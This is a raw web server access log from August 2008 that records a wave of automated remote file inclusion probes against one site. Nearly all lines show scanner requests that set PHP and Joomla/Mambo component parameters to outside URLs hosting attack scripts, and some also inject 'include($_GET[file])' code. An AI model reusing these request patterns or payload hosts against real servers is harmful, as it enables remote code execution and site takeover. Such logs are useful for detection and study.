70.85.201.66 - - [24/Aug/2008:10:26:10 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.149.226.176 - - [24/Aug/2008:10:26:25 -0700] "GET /logs/access_080601.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://125.250.78.194/rgboard/manual/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.149.226.176 - - [24/Aug/2008:10:26:27 -0700] "GET /logs/access_080530.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://125.250.78.194/rgboard/manual/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.97.183.24 - - [24/Aug/2008:10:26:38 -0700] "GET /logs/access_080621.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.battle-elite.de/be_inside/images/cicons/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.9.63.18 - - [24/Aug/2008:10:26:42 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.hladogen.ru/project_files/memei.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
81.9.63.18 - - [24/Aug/2008:10:26:43 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.hladogen.ru/project_files/memei.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.53.240.146 - - [24/Aug/2008:10:26:52 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.149.232.117 - - [24/Aug/2008:10:27:03 -0700] "GET /logs/access_080324.log/page.php?doc=http://www.voipanywhere.pt/modules/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.149.232.117 - - [24/Aug/2008:10:27:06 -0700] "GET /logs/access_080215.log/page.php?doc=http://www.voipanywhere.pt/modules/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.194.149.146 - - [24/Aug/2008:10:27:13 -0700] "GET /logs/access_080713.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.194.149.146 - - [24/Aug/2008:10:27:13 -0700] "GET /logs/access_080606.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
68.178.198.129 - - [24/Aug/2008:10:27:14 -0700] "GET /logs/access_080224.log/?option=com_custompages&cpage=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.178.198.129 - - [24/Aug/2008:10:27:14 -0700] "GET /logs/access_080224.log/?option=com_custompages&cpage=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.85.201.66 - - [24/Aug/2008:10:27:15 -0700] "GET /logs/access_080621.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
204.15.10.22 - - [24/Aug/2008:10:27:35 -0700] "GET /logs/access_080308.log/index.php?redir=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.10.22 - - [24/Aug/2008:10:27:35 -0700] "GET /logs/index.php?redir=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.10.22 - - [24/Aug/2008:10:27:35 -0700] "GET /logs/access_080404.log/index.php?redir=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.10.22 - - [24/Aug/2008:10:27:36 -0700] "GET /index.php?redir=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 200 9904 "-" "libwww-perl/5.810" "www.dmulk.com"
69.73.156.4 - - [24/Aug/2008:10:27:52 -0700] "GET /logs/access_080621.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
62.149.232.117 - - [24/Aug/2008:10:27:55 -0700] "GET /logs/access_080121.log/myevent.php?myevent_path=http://www.clubcello.de/2007/pics/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.194.149.146 - - [24/Aug/2008:10:27:56 -0700] "GET /logs/access_080621.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.6.8.100 - - [24/Aug/2008:10:28:03 -0700] "GET /logs/access_080315.log HTTP/1.0" 200 196608 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
213.194.149.146 - - [24/Aug/2008:10:28:17 -0700] "GET /logs/access_080621.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
80.237.152.109 - - [24/Aug/2008:10:28:32 -0700] "GET /logs/access_080606.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
204.15.10.22 - - [24/Aug/2008:10:28:37 -0700] "GET /logs/access_080118.log/inc/cmses/aedatingCMS.php?dir[inc]=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.10.22 - - [24/Aug/2008:10:28:37 -0700] "GET /inc/cmses/aedatingCMS.php?dir[inc]=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.10.22 - - [24/Aug/2008:10:28:37 -0700] "GET /logs/inc/cmses/aedatingCMS.php?dir[inc]=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
80.237.152.109 - - [24/Aug/2008:10:28:44 -0700] "GET /logs/access_080713.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
69.94.70.15 - - [24/Aug/2008:10:29:00 -0700] "GET /errors.php?error=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
69.94.70.15 - - [24/Aug/2008:10:29:00 -0700] "GET /logs/errors.php?error=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
204.15.10.22 - - [24/Aug/2008:10:29:01 -0700] "GET /logs/access_080124.log/inc/cmses/aedatingCMS.php?dir[inc]=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
212.234.12.71 - - [24/Aug/2008:10:29:14 -0700] "GET /logs/errors.php?error=http://stiegel.biz//modules//News/admin/language/if.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.234.12.71 - - [24/Aug/2008:10:29:15 -0700] "GET /errors.php?error=http://stiegel.biz//modules//News/admin/language/if.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
204.15.10.22 - - [24/Aug/2008:10:29:20 -0700] "GET /index.php?redir=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 200 9904 "-" "libwww-perl/5.810" "www.dmulk.com"
67.212.173.42 - - [24/Aug/2008:10:29:28 -0700] "GET /logs/access_080223.log//oneadmin/config.php?path[docroot]=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.173.42 - - [24/Aug/2008:10:29:28 -0700] "GET //oneadmin/config.php?path[docroot]=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.173.42 - - [24/Aug/2008:10:29:29 -0700] "GET /logs//oneadmin/config.php?path[docroot]=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.94.70.15 - - [24/Aug/2008:10:29:32 -0700] "GET /logs/access_080723.log/errors.php?error=http://www.teamprobes.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.94.70.15 - - [24/Aug/2008:10:29:32 -0700] "GET /errors.php?error=http://www.teamprobes.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.94.70.15 - - [24/Aug/2008:10:29:32 -0700] "GET /logs/errors.php?error=http://www.teamprobes.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.212.173.42 - - [24/Aug/2008:10:29:34 -0700] "GET /logs/access_080731.log//oneadmin/config.php?path[docroot]=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
204.15.10.22 - - [24/Aug/2008:10:29:37 -0700] "GET /phphtml.php?htmlclass_path=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.10.22 - - [24/Aug/2008:10:29:38 -0700] "GET /logs/access_080811.log/phphtml.php?htmlclass_path=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.10.22 - - [24/Aug/2008:10:29:38 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.10.22 - - [24/Aug/2008:10:29:45 -0700] "GET /logs/access_080620.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.10.22 - - [24/Aug/2008:10:29:45 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.10.22 - - [24/Aug/2008:10:29:45 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
81.26.209.159 - - [24/Aug/2008:10:29:46 -0700] "GET /logs/access_080223.log//oneadmin/config.php?path[docroot]=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.15.10.22 - - [24/Aug/2008:10:29:47 -0700] "GET /logs/access_080730.log/phphtml.php?htmlclass_path=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
81.26.209.159 - - [24/Aug/2008:10:29:47 -0700] "GET //oneadmin/config.php?path[docroot]=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.26.209.159 - - [24/Aug/2008:10:29:47 -0700] "GET /logs//oneadmin/config.php?path[docroot]=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.94.70.15 - - [24/Aug/2008:10:29:52 -0700] "GET /logs/access_080722.log/errors.php?error=http://www.teamprobes.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.97.183.24 - - [24/Aug/2008:10:29:55 -0700] "GET /logs/access_080628.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.battle-elite.de/be_inside/images/cicons/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.97.183.24 - - [24/Aug/2008:10:29:55 -0700] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.battle-elite.de/be_inside/images/cicons/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.97.183.24 - - [24/Aug/2008:10:29:55 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.battle-elite.de/be_inside/images/cicons/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.26.209.159 - - [24/Aug/2008:10:29:55 -0700] "GET /logs/access_080731.log//oneadmin/config.php?path[docroot]=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.58.154.237 - - [24/Aug/2008:10:29:57 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.58.154.237 - - [24/Aug/2008:10:29:58 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.15.10.22 - - [24/Aug/2008:10:30:00 -0700] "GET /logs/access_080519.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.10.22 - - [24/Aug/2008:10:30:00 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.10.22 - - [24/Aug/2008:10:30:00 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.10.22 - - [24/Aug/2008:10:30:00 -0700] "GET /logs/access_080622.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.10.22 - - [24/Aug/2008:10:30:03 -0700] "GET /logs/access_080811.log/index.php?redir=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.212.173.42 - - [24/Aug/2008:10:30:07 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.173.42 - - [24/Aug/2008:10:30:07 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
204.15.10.22 - - [24/Aug/2008:10:30:16 -0700] "GET /logs/access_080804.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
212.234.12.71 - - [24/Aug/2008:10:30:25 -0700] "GET /logs/access_080725.log/errors.php?error=http://xwarezx.secretivens.com/idwi.txt?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
193.111.11.7 - - [24/Aug/2008:10:30:45 -0700] "GET /logs/access_080312.log/index3.php?start=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.111.11.7 - - [24/Aug/2008:10:30:47 -0700] "GET /index3.php?start=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.111.11.7 - - [24/Aug/2008:10:30:49 -0700] "GET /logs/index3.php?start=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.111.11.7 - - [24/Aug/2008:10:30:51 -0700] "GET /logs/access_080122.log/index3.php?start=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.237.152.109 - - [24/Aug/2008:10:30:52 -0700] "GET /logs/access_080621.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
216.75.56.186 - - [24/Aug/2008:10:30:53 -0700] "GET /logs/access_080718.log/akocomments.php?mosConfig_absolute_path=http://suport08.freehostia.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.75.56.186 - - [24/Aug/2008:10:30:54 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://suport08.freehostia.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.75.56.186 - - [24/Aug/2008:10:30:54 -0700] "GET /logs/access_080128.log/akocomments.php?mosConfig_absolute_path=http://suport08.freehostia.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.149.232.117 - - [24/Aug/2008:10:31:06 -0700] "GET /logs/access_080708.log%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.voipanywhere.pt/modules/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.194.149.146 - - [24/Aug/2008:10:31:09 -0700] "GET /logs/access_080713.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.194.149.146 - - [24/Aug/2008:10:31:09 -0700] "GET /logs/access_080606.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
194.97.107.200 - - [24/Aug/2008:10:31:16 -0700] "GET /logs/access_080803.log/main.php?page=http://www.topyn.com/bajo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.97.107.200 - - [24/Aug/2008:10:31:16 -0700] "GET /main.php?page=http://www.topyn.com/bajo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.97.107.200 - - [24/Aug/2008:10:31:16 -0700] "GET /logs/main.php?page=http://www.topyn.com/bajo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.149.232.117 - - [24/Aug/2008:10:31:28 -0700] "GET /logs/access_080723.log/myevent.php?myevent_path=http://www.voipanywhere.pt/modules/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.149.232.117 - - [24/Aug/2008:10:31:30 -0700] "GET /myevent.php?myevent_path=http://www.voipanywhere.pt/modules/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.176.226.164 - - [24/Aug/2008:10:32:01 -0700] "GET /logs/access_080811.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://viniciu-s.net/cmdAsc.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.176.226.164 - - [24/Aug/2008:10:32:02 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://viniciu-s.net/cmdAsc.txt?????? HTTP/1.1" 200 10007 "-" "libwww-perl/5.805" "www.dmulk.com"
81.176.226.164 - - [24/Aug/2008:10:32:03 -0700] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://viniciu-s.net/cmdAsc.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.52.244.232 - - [24/Aug/2008:10:32:07 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
86.58.154.237 - - [24/Aug/2008:10:32:13 -0700] "GET /logs/access_080621.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.167.120.102 - - [24/Aug/2008:10:32:16 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
68.167.120.102 - - [24/Aug/2008:10:32:17 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.53.240.146 - - [24/Aug/2008:10:32:19 -0700] "GET /logs/access_080728.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [24/Aug/2008:10:32:20 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.194.149.146 - - [24/Aug/2008:10:32:27 -0700] "GET /logs/access_080601.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
208.97.183.24 - - [24/Aug/2008:10:32:30 -0700] "GET /logs/access_080812.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.battle-elite.de/be_inside/images/cicons/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.194.149.146 - - [24/Aug/2008:10:32:32 -0700] "GET /logs/access_080531.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
70.85.201.66 - - [24/Aug/2008:10:32:36 -0700] "GET /logs/access_080628.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.201.66 - - [24/Aug/2008:10:32:36 -0700] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.201.66 - - [24/Aug/2008:10:32:36 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.53.240.146 - - [24/Aug/2008:10:32:36 -0700] "GET /logs/access_080117.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.194.149.146 - - [24/Aug/2008:10:32:39 -0700] "GET /logs/access_080601.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.194.149.146 - - [24/Aug/2008:10:32:42 -0700] "GET /logs/access_080531.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.52.244.232 - - [24/Aug/2008:10:32:55 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:10:33:02 -0700] "GET /logs/errors.php?error=http://spiritualcultivation.com/modules/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:10:33:03 -0700] "GET /errors.php?error=http://spiritualcultivation.com/modules/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.203.202.68 - - [24/Aug/2008:10:33:11 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.203.202.68 - - [24/Aug/2008:10:33:11 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:10:33:17 -0700] "GET /logs/access_080809.log/errors.php?error=http://spiritualcultivation.com/modules/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:10:33:17 -0700] "GET /errors.php?error=http://spiritualcultivation.com/modules/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:10:33:18 -0700] "GET /logs/errors.php?error=http://spiritualcultivation.com/modules/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.248.62.98 - - [24/Aug/2008:10:33:32 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.248.62.98 - - [24/Aug/2008:10:33:33 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:10:33:36 -0700] "GET /logs/access_080315.log/errors.php?error=http://spiritualcultivation.com/modules/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
